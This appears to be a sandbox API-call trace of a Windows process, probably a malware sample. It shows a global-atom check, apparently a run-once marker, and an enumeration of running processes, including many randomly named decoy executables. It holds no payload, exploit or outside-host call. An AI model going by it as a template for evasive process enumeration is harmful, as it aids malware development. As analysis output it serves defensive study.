	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.555] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetLastError () returned 0x5
	[0128.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.556] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.557] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.557] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.557] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.557] CloseHandle (hObject=0x2dc) returned 1
	[0128.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.557] CloseHandle (hObject=0x2dc) returned 1
	[0128.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.558] CloseHandle (hObject=0x2dc) returned 1
	[0128.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.558] CloseHandle (hObject=0x2dc) returned 1
	[0128.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.559] CloseHandle (hObject=0x2dc) returned 1
	[0128.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.559] CloseHandle (hObject=0x2dc) returned 1
	[0128.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.596] CloseHandle (hObject=0x2dc) returned 1
	[0128.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.596] CloseHandle (hObject=0x2dc) returned 1
	[0128.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.597] CloseHandle (hObject=0x2dc) returned 1
	[0128.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.597] CloseHandle (hObject=0x2dc) returned 1
	[0128.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.598] CloseHandle (hObject=0x2dc) returned 1
	[0128.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.599] CloseHandle (hObject=0x2dc) returned 1
	[0128.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.599] CloseHandle (hObject=0x2dc) returned 1
	[0128.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.599] CloseHandle (hObject=0x2dc) returned 1
	[0128.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.600] CloseHandle (hObject=0x2dc) returned 1
	[0128.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.600] CloseHandle (hObject=0x2dc) returned 1
	[0128.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.601] CloseHandle (hObject=0x2dc) returned 1
	[0128.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.601] CloseHandle (hObject=0x2dc) returned 1
	[0128.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.602] CloseHandle (hObject=0x2dc) returned 1
	[0128.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.602] CloseHandle (hObject=0x2dc) returned 1
	[0128.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.602] CloseHandle (hObject=0x2dc) returned 1
	[0128.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.603] CloseHandle (hObject=0x2dc) returned 1
	[0128.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.603] CloseHandle (hObject=0x2dc) returned 1
	[0128.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.604] CloseHandle (hObject=0x2dc) returned 1
	[0128.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.604] CloseHandle (hObject=0x2dc) returned 1
	[0128.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.605] CloseHandle (hObject=0x2dc) returned 1
	[0128.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.605] CloseHandle (hObject=0x2dc) returned 1
	[0128.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.605] CloseHandle (hObject=0x2dc) returned 1
	[0128.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.606] CloseHandle (hObject=0x2dc) returned 1
	[0128.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.606] CloseHandle (hObject=0x2dc) returned 1
	[0128.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.607] CloseHandle (hObject=0x2dc) returned 1
	[0128.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.607] CloseHandle (hObject=0x2dc) returned 1
	[0128.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.607] CloseHandle (hObject=0x2dc) returned 1
	[0128.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.608] CloseHandle (hObject=0x2dc) returned 1
	[0128.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.608] CloseHandle (hObject=0x2dc) returned 1
	[0128.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.609] CloseHandle (hObject=0x2dc) returned 1
	[0128.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.609] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
